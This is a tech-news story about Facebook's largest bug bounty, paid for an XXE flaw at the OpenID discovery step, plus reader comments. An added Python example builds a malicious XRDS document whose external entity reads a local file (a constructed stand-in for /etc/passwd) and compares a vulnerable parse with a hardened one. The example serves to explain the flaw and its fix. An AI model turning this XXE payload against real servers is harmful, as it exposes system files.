Facebook's Biggest Bounty Yet To Hacker Who Found "Keys To the Kingdom"
mask.of.sanity writes "Facebook has paid out its largest bug bounty of $33,500 for a serious remote code execution vulnerability which also returned Facebook's /etc/passwd. The researcher could change Facebook's use of Gmail as an OpenID provider to a URL he controlled, and then send a request carrying malicious XML code. The Facebook response included its /etc/passwd, which contained essential login information such as system administrator data and user IDs. The company quickly patched the flaw and awarded him for the proof-of-concept remote code execution, which he quietly disclosed to them."
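The mechanism the summary describes is XML external entity (XXE) injection at the OpenID discovery step: the relying party fetches an XML discovery document (XRDS/Yadis) from whatever URL it was pointed at, and a parser that resolves external entities will splice a local file such as /etc/passwd into the parsed result. The block below is an added example written for this page, not Facebook's code and not the researcher's proof of concept. Everything in it is constructed: a temp file stands in for /etc/passwd, the XRDS document is a hypothetical attacker payload, and the "resolve" branch emulates a library that fetches SYSTEM entities (Python's expat does not resolve them unless you give it a handler, so the vulnerable behaviour is opted into deliberately so the two configurations can be compared side by side).

```python
"""Added example (not from the story or from Facebook): XXE through an OpenID
relying party's XRDS discovery document, vulnerable and hardened parse side by
side.  All inputs are constructed; no real system file is read."""
import os
import tempfile
import xml.parsers.expat
from xml.parsers.expat import ExpatError

# Constructed stand-in for /etc/passwd (assumed content, not real data).
FAKE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)


def write_secret_file():
    """Write the constructed secret to a temp file and return its absolute path."""
    fd, path = tempfile.mkstemp(prefix="fake_passwd_")
    with os.fdopen(fd, "w") as f:
        f.write(FAKE_PASSWD)
    return path


def malicious_xrds(target_path):
    """Hypothetical discovery document an attacker's OpenID URL would serve: the
    DTD declares an external entity pointing at a local file and <URI> uses it."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE xrds:XRDS [\n'
        f'  <!ENTITY xxe SYSTEM "file://{target_path}">\n'
        ']>\n'
        '<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">\n'
        '  <XRD>\n'
        '    <Service priority="0">\n'
        '      <Type>http://specs.openid.net/auth/2.0/server</Type>\n'
        '      <URI>&xxe;</URI>\n'
        '    </Service>\n'
        '  </XRD>\n'
        '</xrds:XRDS>\n'
    ).encode()


def parse_xrds_uri(doc, resolve_external_entities):
    """Return the text of the first <URI> element of an XRDS document.

    resolve_external_entities=True emulates a parser that fetches SYSTEM
    entities (the vulnerable configuration); False refuses every external
    entity, which is the fix.  Returns None when the parse is rejected."""
    parser = xml.parsers.expat.ParserCreate()
    uri_text = []
    state = {"in_uri": False}

    def start(name, attrs):
        if name == "URI":
            state["in_uri"] = True

    def end(name):
        if name == "URI":
            state["in_uri"] = False

    def chars(data):
        # Runs on the main parser and, via inherited handlers, on the child
        # parser that processes the entity body, so file contents land here.
        if state["in_uri"]:
            uri_text.append(data)

    def resolve(context, base, system_id, public_id):
        # Vulnerable: read whatever the DTD points at and parse it as entity
        # content.  Only file: is handled here; a resolving library would fetch
        # http: the same way, which is how XXE also becomes SSRF.
        if not system_id.startswith("file://"):
            return 0
        with open(system_id[len("file://"):], "rb") as f:
            body = f.read()
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(body, True)
        return 1

    def refuse(context, base, system_id, public_id):
        # Hardened: never resolve external entities.  Returning 0 makes expat
        # abort the parse with an ExpatError instead of silently continuing.
        return 0

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.ExternalEntityRefHandler = resolve if resolve_external_entities else refuse
    try:
        parser.Parse(doc, True)
    except ExpatError:
        return None
    return "".join(uri_text)


def demo():
    """Run both parser configurations over the same payload: (leaked, hardened)."""
    path = write_secret_file()
    try:
        doc = malicious_xrds(path)
        leaked = parse_xrds_uri(doc, resolve_external_entities=True)
        hardened = parse_xrds_uri(doc, resolve_external_entities=False)
    finally:
        os.unlink(path)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = demo()
    print("resolving parser put this in <URI>:\n" + (leaked or ""))
    print("hardened parser result:", hardened)
```

The leaked text ends up in the field the relying party treats as the provider endpoint, so anything that echoes or logs that field (an error message saying the URI is invalid, for instance) hands the file back to the attacker. The fix is the same in every XML library: do not resolve external entities, and preferably reject any DOCTYPE at all (in PHP that was `libxml_disable_entity_loader(true)`; in Java's Xerces-based parsers, the `http://apache.org/xml/features/disallow-doctype-decl` feature).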
Re:a pittance in ayn rands america. (Score:4, Interesting)
Re:a pittance in ayn rands america. (Score:2, Interesting)
More than one worker drowned in concrete during the construction of the Hoover Dam, and there are bodies entombed in the blockwork.
Many workers died constructing the dam, yes. But none of them drowned in the concrete pours (they may have drowned in the mixing buckets; I don't know about that), and nobody is entombed in the blockwork. A human body is much weaker than concrete - a body in the mix would have compromised the structural integrity of that area. Even if someone had drowned in a pour, which would have been very difficult given that each pour only raised the concrete level by about an inch, the body would have been pulled out as an unacceptable structural risk.
http://en.wikipedia.org/wiki/Hoover_Dam#Concrete [wikipedia.org]
Re:a pittance in ayn rands america. (Score:3, Interesting)
You should reread Ayn Rand. In Atlas Shrugged, where she creates her "perfect society", people pay each other for everything. When Dagny stayed over at John Galt's house and needed to use the stove, she gave him $0.05.
So Ayn would, I think, be happier to see bounties than Facebook saying, hey, give me this info for free.
And while they probably do have a security team, by crowdsourcing something like this you allow many, many, many more people to look at Facebook and fix it.
Re:/etc/password, not /etc/shadow! (Score:5, Interesting)
And, let's be honest, /etc/password sounds scary, and is probably the most attention-getting thing this guy could have said to the average person.